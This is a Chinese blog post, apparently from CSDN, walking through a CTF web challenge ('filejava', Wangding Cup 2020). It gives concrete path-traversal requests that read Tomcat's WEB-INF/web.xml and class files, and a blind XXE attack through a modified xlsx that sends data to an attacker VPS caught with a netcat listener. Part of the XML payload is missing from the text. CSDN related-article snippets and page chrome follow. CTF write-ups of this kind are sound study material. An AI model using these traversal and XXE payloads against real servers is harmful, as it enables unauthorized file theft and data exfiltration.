java神器青龙_[网鼎杯 2020 青龙组]filejava

最新推荐文章于 2022-12-28 19:42:19 发布
最新推荐文章于 2022-12-28 19:42:19 发布
阅读量126 收藏
点赞数
文章标签: java神器青龙
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39887386/article/details/114954961
版权

知识点

web.xml文件泄露

blind xxe

随便上传一个文件,然后点击下载,抓包

看到有filename,猜测可能存在目录穿越以及任意文件下载

尝试

filename=../

看到有一个路径,里面有WEB-INF,题目提示与java有关,那应该是web.xml文件泄露,尝试读取

DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml

这里的读取我是又抓了一次包,把上面repeater的报文复制到proxy,再Forward下载文件

其实不需要这么麻烦,上图右半部分已经给出了三个class文件的地址,下下来就行了

repeater中

DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/DownloadServlet.class

repeater重放就能发现有东西,重新点一次下载,将repeater的报文复制到proxy里,点击Forward,就可以下载到DownloadServlet.class文件

按照这个方法,依次下载web.xml中出现的DownloadServlet.class,ListFileServlet.class,UploadServlet.class等三个class文件

对这些class文件进行反编译,我用的jd-gui

代码太多,只贴关键的

这里是一个excel和xxe漏洞的结合,CVE-2014-3529

这里需要用到vps,因为是在buu上复现的,所以注册一个小号,开一台靶机就行

新建一个excel-123456.xlsx文件,后缀名改成zip。注意,修改zip文件的时候,最后用WinRAR打开修改,完事直接保存,若是先解压,修改完了再压缩,有可能出问题。接下来就是在里面的[Content_Types].xml的第二行加入

%remote;%int;%send;

]>

然后在靶机的/var/www/html目录下新建一个file.dtd文件,内容为

">

然后就是监听

nc -lvvp 9999

紧接着上传excel-123456.xlsx文件,在靶机处接收到flag

参考

weixin_39887386
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网鼎杯 2020 青龙 wp ]filejava
mutou990的博客
08-13 682
知识点 web.xml文件泄露 blind xxe 用到的工具: burpsuit或者hackbar都可以 审题 1打开题目如下 2随便上传一个文件,然后点击下载,抓包 看到有filename,猜测可能存在目录穿越以及任意文件下载 3尝试通过报错来获取网站的绝对路径,设置URL参数filename=../ 4爆出了绝对路径,路径里面有WEB-INF,题目提示与java有关,那应该是web.xml文件泄露,尝试读取,修改filename参数如下(…/数量随意写几个): filename=../../..
java format 神器
12-05
java format 神器java format 神器java format 神器java format 神器java format 神器java format 神器
网鼎杯2020青龙——filejava通关思路
m0_61506558的博客
12-28 1279
1、启模式的解析器对象, DocumentBuilderFactory 是一个抽象工厂类,它不能直接实例化,但该类提供了newInstance()方法,这个方法会根据本地平台默认安装的解析器,自动创建一个工厂的对象并返回。驱动程序所必需的接口,其允许应用程序设置和查询解析器中的功能和属性、注册文档处理的事件处理程序,以及开始文档解析。在dnslog平台申请一个域名,点击上传会有数据外带,说明该程序存在漏洞,我们接下来就是要判断是有回显还是没有回显。因为使用了同一个接口,所以这两种方式的调用方法是完全一致的。
[网鼎杯 2020 青龙]filejava
SopRomeo的博客
01-15 731
可以发现他的form表单传入的路径是/UploadServlet 明显就是一个Java类 经过测试尝试目录穿越 报错500 回显了一段前端,我们用脚本处理下 处理后爆出绝对路径 只要稍微学过一点java web的人都知道web.xml是java的配置文件 一般都在WEB-INF目录下 ../../../web.xml 成功读取到配置文件。以及各个类的路径 只要你搭过Tomcat服务器就知道这些类都在WEB-INF/classes目录下 把这些类全部下下来 ../../../classes/cn/.
2020网鼎杯青龙)--WEB--FileJava(XXE)
a965527596的博客
05-17 2063
FileJava 1.打开题目,只有上传和下载的功能,可以上传任意文件和下载文件,但是不能访问,所以不能用一句话连接,在下载文件功能发现可以下载任意文件,于是将WEB-INF/web.xml页面下载下来,发现有上传和下载的配置文件,由2个类成,将这2个类下载下来。 <?xml version="1.0" encoding="UTF-8"?> -<web-app version="4.0" xsi:schemaLocation="http://xmlns.jcp.org/xml/n
Java学习路线总结,搬砖工逆袭Java架构师
热门推荐
学Java,找哪吒
09-07 25万+
定期分享Java硬核技术干货、分享Java学习路线、分享Java经典面试题
Java开发的建站系统神器源码.zip
05-20
Java开发的建站系统神器源码,目前已经有 10w+ 网站使用 JPress 进行驱动,其中包括多个政府机构,200+上市公司,中科院、红+字会等。Java开发的建站系统神器源码,目前已经有 10w+ 网站使用 JPress 进行驱动,其中...
基于JAVA开发的拼单神器( leanCloud后端)
05-10
【标题】"基于JAVA开发的拼单神器(leanCloud后端)" 提示我们这是一个使用Java编程语言构建的在线拼单应用的后端部分。它很可能利用了leanCloud作为云数据库和服务平台,提供了数据存储、实时通信等功能,帮助...
BBS.rar_Java编程_Java_
08-12
SSH框架是Java Web开发的三大神器,它们各自负责应用程序的不同层面,共同构建了一个功能强大的开发环境。标题中的"BBS.rar_Java编程_Java_"暗示了这是一个关于使用Java语言和SSH框架开发BBS(电子公告板系统)的...
Java性能分析神器-JProfiler
08-01
JProfiler 是一款高性能、无侵入的 Java 性能监控神器,可以快速启动并提供丰富的性能分析功能。它适用于各种 Java 应用程序,包括服务化架构下的应用程序。JProfiler 可以帮助您监控服务的运行情况,例如当前 QPS、...
[CTF]网鼎杯2020-青龙-Web-FileJava-WriteUp
胖胖的ALEX
05-14 4403
一、赛题截图 二、做题思路 (1)查看源码,唯一有点用信息:./UploadServlet. (2)虽然题目名称和查看源码./UploadServlet都告诉这是一个JAVA程序,但建议还是访问/robots.txt,碰碰运气。 (3)随便上传一个dog.png图片,用Burpsuite抓包,发现新的URL地址:/DownloadServlet?filename=a6c672c9-a74c-4701-abfc-97d68e3c681d_dog.png (4)Burpsuite拦截下载文件请求URL,
java Swing中JTextField自动补全功能例子
爱的叹息的专栏
08-12 7万+
涉及到两个Java类 主类:AutoCompleteComponet.java 数据类:AutoCompleteComponet.java 效果图如下: 代码如下: 主类:AutoCompleteComponet.javapackage com.JTextFileAndJComboBox;import java.awt.BorderLayout;public class AutoCompl
ASP基于BS结构的学生在线选课系统的实现(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
基于SSM的高校实验室预约管理系统的设计与实现源码
08-10
本系统结合当前实验室预约、使用和管理中存在的问题和现状进行分析,设计一套可以解决实验室使用冲突、预约流程简单的实验室预约管理系统,满足实验室的在线预约申请与审核的基本需求,可以方便对实验室和实验室设备进行信息化管理。本系统中的教师可以查看当前实验室以及设备的基本信息,在线进行实验室的预约。管理员可以对实验室和实验室的设备进行管理,以及实验室的预约申请进行审核。
毕业设计javajsp超市会员管理系统ssm源码含文档工具包
08-10
毕业设计javajsp超市会员管理系统ssm源码含文档工具包 后台是ssm框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 会员管理 公告育理 评论管理 前台 邮箱管理 积分管理 帮动 修改密码 退出系统 会员管理 公告管理 评论管理 工具管理 包含:源码、数据库脚本、论文、答辩ppt、开题报告、环境工具包、相同框架项目的安装教程(在说明文档中)
STM32F103C8T6 CAN通讯HAL库代码,采用中断接收,含Stm32CubeMX工程
最新发布
08-10
STM32F103C8T6 CAN通讯HAL库例程代码,采用中断接收,含Stm32CubeMX工程
c++的概要介绍与分析
08-10
C++是一种广泛使用的编程语言,它以其强大的功能和灵活性在计算机科学领域占据重要地位。以下是对C++资源的详细描述: 一、C++概述 C++是在C语言的基础上发展而来的,它保留了C语言的简洁、高效和接近硬件等特点,并增加了面向对象编程的支持。C++支持面向过程和面向对象的程序设计方法,使得开发者能够根据需要灵活选择编程范式。 二、C++特点 高效性:C++生成的代码质量高,程序执行效率高,仅比汇编语言慢10%~20%。 面向对象:支持封装、继承和多态等面向对象编程特性,便于构建复杂系统。 兼容性:与C语言高度兼容,绝大多数C语言程序可以不经修改在C++环境中运行。 可扩展性:支持泛型编程、模板等高级特性,提高了代码的可重用性和可维护性。 三、学习资源 官方文档:C++标准委员会发布的官方文档是了解C++语言特性的权威资源。 书籍:《C++ Primer》、《Effective C++》等经典书籍是学习C++的必备资料,它们详细介绍了C++的语法、特性和最佳实践。 在线课程:Coursera、网易云课堂等在线教育平台提供了丰富的C++课程,适合不同水平的学习者。 社区和论坛:Stac
掌握Java神器MyEclipse:提升开发效率的全能集成工具
Java开发领域,MyEclipse是一款备受青睐的集成开发环境(IDE),其重要性不言而喻。相比于基础的记事本开发,MyEclipse通过其强大的功能和智能化的设计,极大地提高了开发效率,使得项目管理更为便捷。作为一款...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值